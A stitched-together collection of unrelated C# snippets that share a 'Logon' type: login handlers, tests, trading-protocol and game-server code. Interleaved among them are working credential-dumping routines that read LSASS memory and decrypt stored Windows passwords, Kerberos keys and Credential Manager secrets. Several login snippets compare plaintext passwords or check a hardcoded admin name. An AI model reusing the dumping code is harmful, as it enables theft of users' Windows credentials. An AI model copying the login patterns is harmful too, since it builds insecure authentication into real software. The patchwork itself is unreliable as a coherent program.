/// <summary>
/// Connects to the realmlist and afterwards, the WorldServer
/// </summary>
/// <param name="sender"></param>
/// <param name="e"></param>
private void btnConnect_Click(object sender, EventArgs e)
{
if (!isConnected)
{
logon = new Logon();
if (logon.Start(ConfigOptions.Host, ConfigOptions.LogonPort, textBoxUsername.Text, textBoxPassword.Text))
{
MessageForm.MessageWindow = new MessageWindow();
MessageForm.MessageWindow.Show();
SystemMgr.StartTimer();
#region Control Visibility
btnConnect.Visible = false;
textBoxUsername.Visible = false;
textBoxPassword.Visible = false;
btnLogout.Visible = true;
btnTickets.Visible = true;
#endregion
isConnected = true;
lblconnection.ForeColor = Color.SeaGreen;
lblconnection.Text = " Connected";
Logging.Notify("[Info]:", "Successfully connected to the Logon..", true);
}
else
MessageBox.Show("Could not connect..", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
else
MessageBox.Show("You're already connected!", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
private void BtnLogin_Click(object sender, EventArgs e)
{
try
{
var resultado = Logon.ValidarUsuario(txtLogin.Text, txtSenha.Text);
if (resultado)
{
var form = new Menu();
Visible = false;
form.ShowDialog(this);
}
else
{
MessageBox.Show("Usuario ou Senha Inválidos.", "Aviso Sistema", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
catch (Exception ex)
{
MessageBox.Show($"Erro Fatal: {ex}", "Aviso Sistema");
}
}
public bool CheckGradStudent(string sid, ref List <string> errors)
{
var logon = new Logon {
Id = string.Empty, Role = "invalid"
};
var conn = new SqlConnection(ConnectionString);
try
{
var adapter = new SqlDataAdapter(IsGradStudent, conn)
{
SelectCommand =
{
CommandType = CommandType.StoredProcedure
}
};
adapter.SelectCommand.Parameters.Add(new SqlParameter("@sid", SqlDbType.VarChar, 20));
adapter.SelectCommand.Parameters["@sid"].Value = sid;
var dataSet = new DataSet();
adapter.Fill(dataSet);
if (dataSet.Tables[0].Rows.Count > 0)
{
return(dataSet.Tables[0].Rows[0]["result"].ToString() == "true" ? true : false);
}
}
catch (Exception e)
{
errors.Add("Error: " + e);
}
finally
{
conn.Dispose();
}
return(false);
}
public Logon GetAuthenticatedCustomer()
{
//whether there is a cached customer
if (_cachedCustomer != null)
{
return(_cachedCustomer);
}
//try to get authenticated user identity
var authenticateResult = _httpContextAccessor.HttpContext.AuthenticateAsync(AuthenticationDefaults.AuthenticationScheme).Result;
if (!authenticateResult.Succeeded)
{
return(null);
}
Logon customer = null;
var serialNumberClaim = authenticateResult.Principal.FindFirst(claim => claim.Type == ClaimTypes.SerialNumber &&
claim.Issuer.Equals(AuthenticationDefaults.ClaimsIssuer, StringComparison.InvariantCultureIgnoreCase));
if (serialNumberClaim != null)
{
customer = _customerRepository.Table.Include(x => x.UserRoleMappings)
.Where(c => c.LogonId == Convert.ToInt32(serialNumberClaim.Value)).FirstOrDefault();
}
//whether the found customer is available
if (customer == null)
{
return(null);
}
//cache authenticated customer
_cachedCustomer = customer;
return(_cachedCustomer);
}
public void AuthTest()
{
//// Arrange
var errors = new List <string>();
var logon = new Logon {
Id = "1", Role = "TestRole"
};
var mockRepository = new Mock <IAuthorizeRepository>();
mockRepository.Setup(x => x.Authenticate("testuser", "testpassword", ref errors))
.Returns(logon);
var authService = new AuthorizeService(mockRepository.Object);
//// Act
var logonReturned = authService.Authenticate("testuser", "testpassword", ref errors);
//// Assert
Assert.AreEqual(logon.ToString(), logonReturned.ToString());
Assert.AreEqual(0, errors.Count);
mockRepository.Verify(x => x.Authenticate(It.IsAny <string>(), It.IsAny <string>(), ref errors), Times.Once);
}
public ActionResult ValidateLogin(Logon user)
{
if (ModelState.IsValid)
{
Logon users = null;
using (MySqlConnection conn = DBUtils.GetConnection())
{
LogonRepository repo = new LogonRepository(conn);
users = repo.GetByName(user.UserName);
}
if (users.Password.Equals(user.Password))
{
context.SetAuthenticationToken(user.UserName.ToString(), false, user);
return(RedirectToAction("Index", "Home"));
}
else
{
ModelState.AddModelError(string.Empty, "Invalid Login Information.");
return(View("Login", user));
}
}
return(View("Login", user));
}
private async Task <bool> IsAdmin()
{
string adminPassword = "******";
try
{
if (Username.Equals("betafastadmin") && Encrypt(SecureStringUtility.SecureStringToString(Password)).Equals(adminPassword))
{
return(true);
}
else
{
return(await Logon.IsAdmin());
}
}
catch (ServerException e)
{
ClearForm();
MessageColor = "Red";
Message = e.Message;
throw new Exception();
}
catch (UserDoesNotExistException)
{
ClearForm();
MessageColor = "Red";
Message = ROLE_ERROR;
throw new Exception();
}
catch (Exception e)
{
ClearForm();
MessageColor = "Red";
Message = ROLE_ERROR;
throw new Exception();
}
}
public virtual void ToAdmin(QuickFix.Message message, QuickFix.SessionID session)
{
try
{
logger.Debug("SND(Admin) --> type[" + message.GetType().ToString() + "] msg[" + message.ToString() + "]");
//if (message.Header.GetField(QuickFix.Fields.Tags.MsgType) != QuickFix.Fields.MsgType.HEARTBEAT)
// this.Crack(message, session);
// Complementa a mensagem de logon com a senha
if (message.GetType() == typeof(Logon))
{
Logon message2 = (Logon)message;
if (_channelUmdfConfig.LogonPassword != "")
{
message2.Set(new QuickFix.Fields.RawData(_channelUmdfConfig.LogonPassword));
message2.Set(new QuickFix.Fields.RawDataLength(_channelUmdfConfig.LogonPassword.Length));
if (_channelUmdfConfig.NewPassword != null && _channelUmdfConfig.NewPassword.Length > 0)
{
QuickFix.Fields.StringField newPassword = new QuickFix.Fields.StringField(925, _channelUmdfConfig.NewPassword.Trim());
message2.SetField(newPassword);
}
}
message2.Set(new QuickFix.Fields.HeartBtInt(_channelUmdfConfig.HeartBtInt));
message2.Set(new QuickFix.Fields.EncryptMethod(0));
message2.Set(new QuickFix.Fields.ResetSeqNumFlag(_channelUmdfConfig.ResetOnLogon));
}
logger.Debug("ToAdmin(). Session id : " + session.ToString() + " Msg: " + message.GetType().ToString());
//if (message.getHeader().getField(MsgType.FIELD) != QuickFix.MsgType.Heartbeat)
// this.crack(message, session);
}
catch (Exception ex)
{
logger.Error("ToAdmin(): " + ex.Message, ex);
}
}
public static void OnPacket(Client client, Logon logon)
{
PacketId packid = PacketManager.me.typeIdSets[typeof(Logon)];
LogonResult result = new LogonResult();
result.BallIndex = ballIndex++;
result.X = ClientPool.xx[result.BallIndex];
result.Y = ClientPool.yy[result.BallIndex];
client.Send(result);
AllSmallBalls smallBalls = new AllSmallBalls();
smallBalls.SmallBallCount = SmallBalls.smallBallCount;
smallBalls.BallX = new float[SmallBalls.smallBallCount];
smallBalls.BallY = new float[smallBalls.SmallBallCount];
for (int i = 0; i < smallBalls.BallX.Length; i++)
{
smallBalls.BallX[i] = SmallBalls.me.ballx[i];
smallBalls.BallY[i] = SmallBalls.me.bally[i];
}
client.Send(smallBalls);
client.SetStatus(Client.Status.Working);
}
public async Task <ILoginSession> LogonAsync(string email, string password, string optionalInfo)
{
var result = default(ILoginSession);
if (Adapter == AdapterType.Controller)
{
var accountManager = Logic.Factory.CreateAccountManager();
result = await accountManager.LogonAsync(email, password, optionalInfo).ConfigureAwait(false);
}
else if (Adapter == AdapterType.Service)
{
var logon = new Logon
{
Email = email,
Password = password,
OptionalInfo = optionalInfo,
};
using var serviceInvoker = new Service.InvokeServiceAdapter(BaseUri);
result = await serviceInvoker.LogonAsync(logon).ConfigureAwait(false);
}
return(result);
}
/// <summary>
/// Authenticates a user via the MembershipProvider and creates the associated forms authentication ticket.
/// </summary>
/// <param name="logon">Logon</param>
/// <param name="response">HttpResponseBase</param>
/// <returns>bool</returns>
public static bool ValidateUser(Logon logon, HttpResponseBase response)
{
bool result = false;
if (Membership.ValidateUser(logon.Username, logon.Password))
{
// Create the authentication ticket with custom user data.
var serializer = new JavaScriptSerializer();
string userData = serializer.Serialize(UserManager.User);
FormsAuthenticationTicket ticket = new FormsAuthenticationTicket(1,
logon.Username,
DateTime.Now,
DateTime.Now.AddDays(30),
true,
userData,
FormsAuthentication.FormsCookiePath);
// Encrypt the ticket.
string encTicket = FormsAuthentication.Encrypt(ticket);
//encTicket = ZipLib.Zip(encTicket);
// Create the cookie.
HttpCookie cookie = new HttpCookie(FormsAuthentication.FormsCookieName);
cookie.Expires = DateTime.Now.AddDays(1);
cookie.Value = encTicket;
response.AppendCookie(cookie);
//response.Cookies.Add(new HttpCookie(FormsAuthentication.FormsCookieName, encTicket));
result = true;
}
return(result);
}
public JsonResult Entrar(Logon model)
{
VetManagerEntities vetManagerDB = new VetManagerEntities();
Users usuarios = vetManagerDB.Users.SingleOrDefault(x => x.UserName == model.UserName && x.Senha == model.Senha);
//Primeira validação
if (model == null || string.IsNullOrEmpty(model.UserName) || string.IsNullOrEmpty(model.Senha))
{
Response.StatusCode = 400;
Response.Write("Necessário informar nome do usuário e senha");
return(null);
}
//Segunda validação
if (usuarios == null)
{
Response.StatusCode = 401;
Response.Write("Login ou Senha inválidos.");
return(null);
}
//Retorno para o HTML
return(Json(usuarios));
}
public static int FindCredentials(IntPtr hLsass, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
foreach (Logon logon in logonlist)
{
IntPtr credmanMem = logon.pCredentialManager;
LUID luid = logon.LogonId;
IntPtr llCurrent;
int reference = 1;
//Console.WriteLine("[*] Credman CredmanListSet found at address {0:X} {1:X}", luid.LowPart, credmanMem.ToInt64());
byte[] credmansetBytes = Utility.ReadFromLsass(ref hLsass, credmanMem, Marshal.SizeOf(typeof(KIWI_CREDMAN_SET_LIST_ENTRY)));
IntPtr pList1 = new IntPtr(BitConverter.ToInt64(credmansetBytes, Utility.FieldOffset <KIWI_CREDMAN_SET_LIST_ENTRY>("list1")));
IntPtr refer = IntPtr.Add(pList1, Utility.FieldOffset <KIWI_CREDMAN_LIST_STARTER>("start"));
byte[] credmanstarterBytes = Utility.ReadFromLsass(ref hLsass, pList1, Marshal.SizeOf(typeof(KIWI_CREDMAN_LIST_STARTER)));
IntPtr pStart = new IntPtr(BitConverter.ToInt64(credmanstarterBytes, Utility.FieldOffset <KIWI_CREDMAN_LIST_STARTER>("start")));
if (pStart == IntPtr.Zero)
{
continue;
}
llCurrent = pStart;
if (llCurrent == refer)
{
continue;
}
do
{
byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, IntPtr.Subtract(llCurrent, Utility.FieldOffset <KIWI_CREDMAN_LIST_ENTRY>("Flink")), Marshal.SizeOf(typeof(KIWI_CREDMAN_LIST_ENTRY)));
KIWI_CREDMAN_LIST_ENTRY entry = Utility.ReadStruct <KIWI_CREDMAN_LIST_ENTRY>(entryBytes);
string username = Utility.ExtractUnicodeStringString(hLsass, entry.user);
string domain = Utility.ExtractUnicodeStringString(hLsass, entry.server1);
string passDecrypted = "";
byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, entry.encPassword, entry.cbEncPassword);
byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey);
if (msvDecryptedPasswordBytes != null && msvDecryptedPasswordBytes.Length > 0)
{
UnicodeEncoding encoder = new UnicodeEncoding(false, false, true);
try
{
passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
}
catch (Exception)
{
passDecrypted = Utility.PrintHexBytes(msvDecryptedPasswordBytes);
}
}
if (!string.IsNullOrEmpty(username) && username.Length > 1)
{
Credential.CredMan credmanentry = new Credential.CredMan();
credmanentry.Reference = reference;
credmanentry.UserName = username;
if (!string.IsNullOrEmpty(domain))
{
credmanentry.DomainName = domain;
}
else
{
credmanentry.DomainName = "[NULL]";
}
// Check if password is present
if (!string.IsNullOrEmpty(passDecrypted))
{
credmanentry.Password = passDecrypted;
}
else
{
credmanentry.Password = "******";
}
Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
if (currentlogon == null)
{
currentlogon = new Logon(luid);
currentlogon.UserName = username;
currentlogon.Credman = new List <Credential.CredMan>();
currentlogon.Credman.Add(credmanentry);
logonlist.Add(currentlogon);
}
else
{
if (currentlogon.Credman == null)
{
currentlogon.Credman = new List <Credential.CredMan>();
}
currentlogon.Credman.Add(credmanentry);
}
}
reference++;
llCurrent = entry.Flink;
} while (llCurrent != IntPtr.Zero && llCurrent != refer);
}
return(0);
}
//public ActionResult Login(String username, String password)
public async Task <ActionResult> Login([Bind(Include = "Username,Password")] Logon logon)
{
if (ModelState.IsValid)
{
// Authenticate the user.
if (UserManager.ValidateUser(logon, Response))
{
/* move temporary shopping cart to DB */
string dateOfOpen = string.Empty;
// get tmp Cart in cookie
HttpCookie reqCartInfoCookies = HttpContext.Request.Cookies["CartInfo"];
if (reqCartInfoCookies != null) // there is a temporary Cart in cookies
{
dateOfOpen = reqCartInfoCookies["DateOfOpen"].ToString();
Cart cart = null;
// get existing Cart
ShoppingService shoppingService = new ShoppingService();
cart = await shoppingService.getCart(UserManager.User.Id);
// there is no existing Shopping Cart for this user -> create new Shopping Cart
if (cart == null)
{
cart = new Cart();
cart.UserId = UserManager.User.Id;
cart.DateOpen = DateTime.Parse(dateOfOpen);
// add cart into system
cart = await shoppingService.addCart(cart);
}
HttpCookie reqIDListCookies = Request.Cookies["ProductDetailIDlist"];
if (reqIDListCookies != null)
{
string dataAsString = reqIDListCookies.Value;
if (!dataAsString.Equals(string.Empty))
{
List <int> listdata = new List <int>();
listdata = dataAsString.Split(',').Select(x => Int32.Parse(x)).ToList();
for (int i = 0; i < listdata.Count(); i++)
{
HttpCookie reqCartItemCookies = Request.Cookies["CartItems[" + listdata[i].ToString() + "]"];
if (reqCartItemCookies != null)
{
CartItem cookiesItem = new JavaScriptSerializer()
.Deserialize <CartItem>(reqCartItemCookies.Value);
// get Cart Item of this ProductDetailId in DB
int productDetailId = listdata[i];
CartDetailItem detail = await shoppingService
.getCartItemByCartIdAndProductDetailsId(cart.CartId, productDetailId);
if (detail == null)
{
detail = new CartDetailItem();
detail.UserId = UserManager.User.Id;
detail.Amount = (short)cookiesItem.Amount;
detail.ExtendedPrice = cookiesItem.Price;
detail.Type = 0;
detail.ProductDetailsId = listdata[i];
detail.CartId = cart.CartId;
// add into system
await shoppingService.addCartItem(detail);
}
else
{
detail.Amount += (short)cookiesItem.Amount;
// update into system
await shoppingService.updateQuantity(detail);
}
/* remove cart item of this ProductDetailId in cookies */
var respCartItemscookies = new HttpCookie("CartItems[" + listdata[i].ToString() + "]");
respCartItemscookies.Expires = DateTime.Now.AddDays(-1D);
Response.Cookies.Add(respCartItemscookies);
}
}
/* update productDetailID list in cookies */
HttpCookie respIDListCookies = new HttpCookie("ProductDetailIDlist", "")
{
Expires = DateTime.Now.AddDays(1)
};
HttpContext.Response.Cookies.Add(respIDListCookies);
}
}
}
// Redirect to the secure area.
return(RedirectToAction("Index", "Category"));
}
}
ViewBag.LoginFailure = 1;
return(View());
}
static void Main()
{
const string applicationName = "TotalSmartCodingSolution"; bool createdNew;
mutex = new Mutex(true, applicationName, out createdNew);
if (!createdNew)
{
return;
} //app is already running! Exiting the application
Registries.ProductName = Application.ProductName.ToUpper();
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
AutoMapperConfig.SetupMappings();
//string ApplicationRoleRequired = "false"; //COMMENT ON 11-JUL-2018: NOT USE ApplicationRoleRequired. JUST REMOVE THIS COMMENT ONLY -> TO USE ApplicationRoleRequired (GET ApplicationRoleRequired OPTION FROM CONFIG SETTING BY THE FOLLOWING CommonConfigs.ReadSetting("ApplicationRoleRequired")).
string ApplicationRoleRequired = CommonConfigs.ReadSetting("ApplicationRoleRequired");
ApplicationRoles.Required = true; ApplicationRoles.Name = ""; ApplicationRoles.Password = ""; bool applicationRoleRequired = false;
if (bool.TryParse(ApplicationRoleRequired, out applicationRoleRequired))
{
ApplicationRoles.Required = applicationRoleRequired;
}
TrialConnects trialConnects = new TrialConnects();
DialogResult trialConnectResult = trialConnects.Connected();
if (trialConnectResult == DialogResult.Yes)
{
Logon logon = new Logon();
if (logon.ShowDialog() == DialogResult.OK)
{
if (!GlobalEnums.CBPP)
{
LegalNotice legalNotice = new LegalNotice();
legalNotice.ShowDialog(); legalNotice.Dispose();
}
if (GlobalVariables.FillingLineID == GlobalVariables.FillingLine.Smallpack || GlobalVariables.FillingLineID == GlobalVariables.FillingLine.Pail || GlobalVariables.FillingLineID == GlobalVariables.FillingLine.Medium4L || GlobalVariables.FillingLineID == GlobalVariables.FillingLine.Import || GlobalVariables.FillingLineID == GlobalVariables.FillingLine.Drum)
{
Application.Run(new MasterMDI(GlobalEnums.NmvnTaskID.SmartCoding, new SmartCoding()));
}
else
{
if (GlobalVariables.ConfigID == (int)GlobalVariables.FillingLine.Pickup)
{
Application.Run(new MasterMDI(GlobalEnums.NmvnTaskID.Pickups, new Pickups()));
}
else if (GlobalVariables.ConfigID == (int)GlobalVariables.FillingLine.GoodsIssue)
{
Application.Run(new MasterMDI(GlobalEnums.NmvnTaskID.GoodsIssues, new GoodsIssues()));
}
else
{
Application.Run(new MasterMDI());
}
}
}
logon.Dispose();
}
else
if (trialConnectResult == DialogResult.No)
{
if (ApplicationRoles.Required)
{
ConnectServer connectServer = new ConnectServer(false);
connectServer.ShowDialog(); connectServer.Dispose();
}
else
if (CustomMsgBox.Show(new Form(), "Do you want to specify new application role and password?", "Warning", MessageBoxButtons.YesNoCancel) == DialogResult.Yes)
{
ConnectServer connectServer = new ConnectServer(true);
connectServer.ShowDialog(); connectServer.Dispose();
}
}
}
public static void GetKerberosKeys(ref IntPtr hLsass, byte[] krbrLogonSession, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
Type kerberossessiontype = oshelper.KerberosLogonSessionType;
Type kerberoshshtype = oshelper.KerberosHashType;
IntPtr pKeyList = new IntPtr(BitConverter.ToInt64(krbrLogonSession, oshelper.KerberosLogonSessionKeyListOffset));
if (pKeyList == IntPtr.Zero)
{
return;
}
LUID luid = Utility.ReadStruct <LUID>(Utility.GetBytes(krbrLogonSession, oshelper.KerberosSessionLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID))));
byte[] keylistBytes = Utility.ReadFromLsass(ref hLsass, pKeyList, Marshal.SizeOf(typeof(KIWI_KERBEROS_KEYS_LIST_6)));
int items = BitConverter.ToInt32(keylistBytes, Utility.FieldOffset <KIWI_KERBEROS_KEYS_LIST_6>("cbItem"));
int structsize = Marshal.SizeOf(kerberoshshtype);
int readsize = items * structsize;
byte[] hashpassBytes = Utility.ReadFromLsass(ref hLsass, IntPtr.Add(pKeyList, Marshal.SizeOf(typeof(KIWI_KERBEROS_KEYS_LIST_6))), readsize);
for (int i = 0; i < items; i++)
{
int currentindex = (i * structsize) + oshelper.KerberosHashGenericOffset;
byte[] entryBytes = Utility.GetBytes(hashpassBytes, currentindex, Marshal.SizeOf(typeof(KERB_HASHPASSWORD_GENERIC)));
KERB_HASHPASSWORD_GENERIC entry = Utility.ReadStruct <KERB_HASHPASSWORD_GENERIC>(entryBytes);
string keyentry = KerberosTicketEtype((int)entry.Type);
KerberosKey kkey = new KerberosKey();
kkey.Type = keyentry;
UNICODE_STRING checksum = new UNICODE_STRING
{
Length = (ushort)entry.Size,
MaximumLength = (ushort)entry.Size,
Buffer = entry.Checksump
};
if ((int)entry.Size > 0)
{
if ((int)entry.Size > Utility.FieldOffset <LSAISO_DATA_BLOB>("data"))
{
if ((int)entry.Size <= (Utility.FieldOffset <LSAISO_DATA_BLOB>("data") + ("KerberosKey".Length - 1) + AES_256_KEY_LENGTH)) // usual ISO DATA BLOB for Kerberos AES 256 session key
{
byte[] isoblobBytes = Utility.ReadFromLsass(ref hLsass, checksum.Buffer, Marshal.SizeOf(typeof(LSAISO_DATA_BLOB)));
LSAISO_DATA_BLOB isoblob = Utility.ReadStruct <LSAISO_DATA_BLOB>(isoblobBytes);
kkey.Key = GenericLsaIsoOutput(isoblob);
}
else
{
byte[] encisoblobBytes = Utility.ReadFromLsass(ref hLsass, checksum.Buffer, Marshal.SizeOf(typeof(LSAISO_DATA_BLOB)));
ENC_LSAISO_DATA_BLOB encisoblob = Utility.ReadStruct <ENC_LSAISO_DATA_BLOB>(encisoblobBytes);
kkey.Key = GenericEncLsaIsoOutput(encisoblob, (int)entry.Size);
}
}
else
{
byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, checksum.Buffer, checksum.MaximumLength);
byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey);
kkey.Key = Utility.PrintHashBytes(msvDecryptedPasswordBytes);
}
}
else
{
kkey.Key = "<no size, buffer is incorrect>";
}
Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
if (currentlogon != null)
{
if (currentlogon.KerberosKeys == null)
{
currentlogon.KerberosKeys = new List <KerberosKey>();
}
currentlogon.KerberosKeys.Add(kkey);
}
}
}
public static void GetCredentials(ref IntPtr hLsass, byte[] entry, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
if (entry == null)
{
return;
}
LUID luid = Utility.ReadStruct <LUID>(Utility.GetBytes(entry, oshelper.KerberosSessionLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID))));
UNICODE_STRING usUserName = Utility.ReadStruct <UNICODE_STRING>(Utility.GetBytes(entry, oshelper.KerberosSessionCredentialOffset + oshelper.KerberosSessionUserNameOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
UNICODE_STRING usDomain = Utility.ReadStruct <UNICODE_STRING>(Utility.GetBytes(entry, oshelper.KerberosSessionCredentialOffset + oshelper.KerberosSessionDomaineOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
UNICODE_STRING usPassword = Utility.ReadStruct <UNICODE_STRING>(Utility.GetBytes(entry, oshelper.KerberosSessionCredentialOffset + oshelper.KerberosSessionPasswordOffset, Marshal.SizeOf(typeof(UNICODE_STRING))));
string username = Utility.ExtractUnicodeStringString(hLsass, usUserName);
string domain = Utility.ExtractUnicodeStringString(hLsass, usDomain);
byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, usPassword.Buffer, usPassword.MaximumLength);
byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey);
string passDecrypted = "";
UnicodeEncoding encoder = new UnicodeEncoding(false, false, true);
try
{
passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
}
catch (Exception)
{
passDecrypted = Utility.PrintHexBytes(msvDecryptedPasswordBytes);
}
if (!string.IsNullOrEmpty(username) && username.Length > 1)
{
Credential.Kerberos krbrentry = new Credential.Kerberos();
krbrentry.UserName = username;
if (!string.IsNullOrEmpty(domain))
{
krbrentry.DomainName = domain;
}
else
{
krbrentry.DomainName = "[NULL]";
}
// Check if password is present
if (!string.IsNullOrEmpty(passDecrypted))
{
krbrentry.Password = passDecrypted;
}
else
{
krbrentry.Password = "******";
}
Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
if (currentlogon == null)
{
currentlogon = new Logon(luid);
currentlogon.UserName = username;
currentlogon.Kerberos = krbrentry;
logonlist.Add(currentlogon);
}
else
{
currentlogon.Kerberos = krbrentry;
}
}
}
public void ShouldBeAbleToLogout()
{
Logon.AsInternalUser();
Logon.LogOut();
}
private Task HandleTableResponse(Logon logon)
{
Log.WriteInfo(nameof(HandleTableResponse), "Logon received. Subscribe to quotes", "");
return(Subscribe());
}
public void ShouldBeAbleToLogonAsAProvider()
{
Logon.AsInternalUser("provider");
ShouldBeTextPresent("your bank account details");
}
public ActionResult Logon(Logon model)
{
return View();
}
private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
if (pElement == null)
{
return;
}
byte[] entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE))));
RTL_AVL_TABLE entry = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes);
if (entry.OrderedPointer != IntPtr.Zero)
{
byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(Marshal.SizeOf(oshelper.TSCredType)));
LUID luid = Utility.ReadStruct <LUID>(Utility.GetBytes(krbrLogonSessionBytes, oshelper.TSCredLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID))));
long pCredAddr = BitConverter.ToInt64(krbrLogonSessionBytes, oshelper.TSCredOffset);
byte[] pCredBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(pCredAddr), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_TS_PRIMARY_CREDENTIAL))));
KIWI_TS_PRIMARY_CREDENTIAL pCred = Utility.ReadStruct <KIWI_TS_PRIMARY_CREDENTIAL>(pCredBytes);
UNICODE_STRING usUserName = pCred.credentials.UserName;
UNICODE_STRING usDomain = pCred.credentials.Domaine;
UNICODE_STRING usPassword = pCred.credentials.Password;
string username = Utility.ExtractUnicodeStringString(hLsass, usUserName);
string domain = Utility.ExtractUnicodeStringString(hLsass, usDomain);
byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, usPassword.Buffer, (ulong)usPassword.MaximumLength);
byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey);
string passDecrypted = "";
UnicodeEncoding encoder = new UnicodeEncoding(false, false, true);
try
{
passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
}
catch (Exception)
{
passDecrypted = Utility.PrintHexBytes(msvDecryptedPasswordBytes);
}
if (!string.IsNullOrEmpty(username) && username.Length > 1)
{
Credential.Tspkg krbrentry = new Credential.Tspkg();
if (!string.IsNullOrEmpty(username))
{
krbrentry.UserName = username;
}
else
{
krbrentry.UserName = "******";
}
if (!string.IsNullOrEmpty(domain))
{
krbrentry.DomainName = domain;
}
else
{
krbrentry.DomainName = "[NULL]";
}
// Check if password is present
if (!string.IsNullOrEmpty(passDecrypted))
{
krbrentry.Password = passDecrypted;
}
else
{
krbrentry.Password = "******";
}
Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
if (currentlogon == null)
{
currentlogon = new Logon(luid);
currentlogon.UserName = username;
currentlogon.Tspkg = krbrentry;
logonlist.Add(currentlogon);
}
else
{
currentlogon.Tspkg = krbrentry;
}
}
}
if (entry.BalancedRoot.RightChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, oshelper, iv, aeskey, deskey, logonlist);
}
if (entry.BalancedRoot.LeftChild != IntPtr.Zero)
{
WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, oshelper, iv, aeskey, deskey, logonlist);
}
}
public static int FindCredentials(IntPtr hLsass, IntPtr lsasrvMem, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
{
uint logonSessionListSignOffset;
//IntPtr logonSessionListAddr;
int logonSessionListCount; //*DWORD
// Search for LogonSessionList signature within lsasrv.dll and grab the offset
logonSessionListSignOffset = (uint)Utility.OffsetFromSign("lsasrv.dll", oshelper.logonSessionListSign, max_search_size);
if (logonSessionListSignOffset == 0)
{
Console.WriteLine("[x] Error: Could not find LogonSessionList signature\n");
return(1);
}
//Console.WriteLine("[*] LogonSessionList offset found as {0}", logonSessionListSignOffset);
//logonSessionListAddr = Utility.GetIntPtr(hLsass, lsasrvMem, logonSessionListSignOffset, oshelper.LOGONSESSIONLISTOFFSET);
logonSessionListCount = Utility.GetInt(hLsass, lsasrvMem, logonSessionListSignOffset, oshelper.LOGONSESSIONSLISTCOUNTOFFSET);
//Console.WriteLine("[*] LogSessList found at address {0:X}", logonSessionListAddr.ToInt64());
//Console.WriteLine("[*] LogSessListCount {0}", logonSessionListCount);
IntPtr current = IntPtr.Zero;
for (int i = 0; i < logonSessionListCount; i++)
{
//Console.WriteLine("[!] logonSessionListCount:"+ logonSessionListCount + " -> Step : " + i);
current = Utility.GetIntPtr(hLsass, lsasrvMem, logonSessionListSignOffset, oshelper.LOGONSESSIONLISTOFFSET + (8 * i));
IntPtr pList = current;
do
{
byte[] listentryBytes = Utility.ReadFromLsass(ref hLsass, current, oshelper.ListTypeSize);
GCHandle pinnedArray = GCHandle.Alloc(listentryBytes, GCHandleType.Pinned);
IntPtr listentry = pinnedArray.AddrOfPinnedObject();
KIWI_BASIC_SECURITY_LOGON_SESSION_DATA logonsession = new KIWI_BASIC_SECURITY_LOGON_SESSION_DATA
{
LogonId = IntPtr.Add(listentry, oshelper.LocallyUniqueIdentifierOffset),
LogonType = Marshal.ReadInt32(IntPtr.Add(listentry, oshelper.LogonTypeOffset)), //slistentry.LogonType,
Session = Marshal.ReadInt32(IntPtr.Add(listentry, oshelper.SessionOffset)), //slistentry.Session
pCredentials = new IntPtr(Marshal.ReadInt64(IntPtr.Add(listentry, oshelper.CredentialsOffset))), //slistentry.Credentials,
pCredentialManager = new IntPtr(Marshal.ReadInt64(IntPtr.Add(listentry, oshelper.CredentialManagerOffset))),
pSid = IntPtr.Add(listentry, oshelper.pSidOffset),
LogonTime = Utility.ReadStruct <FILETIME>(IntPtr.Add(listentry, oshelper.LogonTimeOffset + 4))
};
LUID luid = Utility.ReadStruct <LUID>(logonsession.LogonId);
IntPtr pUserName = IntPtr.Add(current, oshelper.UserNameListOffset);
IntPtr pLogonDomain = IntPtr.Add(current, oshelper.DomaineOffset);
IntPtr pLogonServer = IntPtr.Add(current, oshelper.LogonServerOffset);
